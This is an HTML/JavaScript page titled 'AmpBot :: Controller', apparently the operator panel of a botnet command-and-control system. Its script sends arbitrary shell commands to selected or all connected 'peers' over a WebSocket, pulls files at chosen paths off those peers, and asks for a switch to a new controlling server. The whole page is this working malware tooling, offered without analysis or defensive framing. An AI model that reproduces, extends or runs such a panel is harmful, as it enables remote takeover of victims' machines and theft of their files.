<!doctype html>
<html>
    <head>
        <title>AmpBot :: Controller</title>
        <script type="text/javascript" src="js/ws.js"></script>
        <script type="text/javascript" src="//code.jquery.com/jquery-1.11.3.min.js"></script>
        <link rel="stylesheet" type="text/css" href="css/abot.css">
    </head>
    <body>   
    	<script type="text/javascript">
    		var s;
    		$(document).ready(function() {
    	    	s = initWs();
    	    	$("#action-menu").hide();
    	    	$("#submit-exec").click(function() {
    	    		if (serverSwitch == false) {
    	    			var cmd = $("#cmd-exec").val();
    	    			var p = $("#peer-select :selected").text();
    	    			alert("Sending command [" + cmd + "] to [" + p + "] peer(s)");
    	    			var action = {"action": "cmd-exec", "cmd": cmd, "peer": p};
    	    			s.send(JSON.stringify(action));
    	    		} else {
    	    			alert("Please wait for the server to finish switching before sending commands");
    	    		}
    	    	});
    	    	$("#submit-switch").click(function() {
    	    		if (serverSwitch == false) {
    	    			var p = prompt("Sending server switch request. Enter the host/site to ping (leave blank for default):", "");
    	    			if (p == "") {
    	    				p = "default";
    	    			}
    	    			var action = {"action": "new-serv", "ping-dest": p};
    	    			s.send(JSON.stringify(action));
    	    		} else {
    	    			alert("Server switch is already in progress");
    	    		}
    	    	});
    	    	$("#submit-getfile").click(function() {
    	    		if (serverSwitch == false) {
    	    			var path = $("#cmd-exec").val();
    	    			var p = $("#peer-select :selected").text();
    	    			alert("Attempting to retrieve file at path [" + path + "] from [" + p + "] peer(s)");
    	    			var action = {"action": "get-file", "path": path, "peer": p};
    	    			s.send(JSON.stringify(action));
    	    		} else {
    	    			alert("Please wait for the server to finish switching before sending commands");
    	    		}
    	    	});
    		});
    	</script>
    	<div id="container">
    		<h1>AmpBot :: Controller</h1>
    		<p id="s-host"></p>
    		<div id="action-menu">
    			<input id="cmd-exec" type="text" name="cmd-exec" value="" />
    			<select id="peer-select">
    				<option value="0">All</option>
    			</select>
    			<a id="submit-exec" href="#">Send command</a>&nbsp;<a id="submit-getfile" href="#">Get file</a>&nbsp;<a id="submit-switch" href="#">Switch server</a><br />
    			<p>Command output:</p>
    			<textarea id="cmd-output" rows="10" cols="100"></textarea>
    		</div>
    		<p id="peer-num"></p>
    		<div id="peer-list"></div>
    	</div>
    </body>
</html>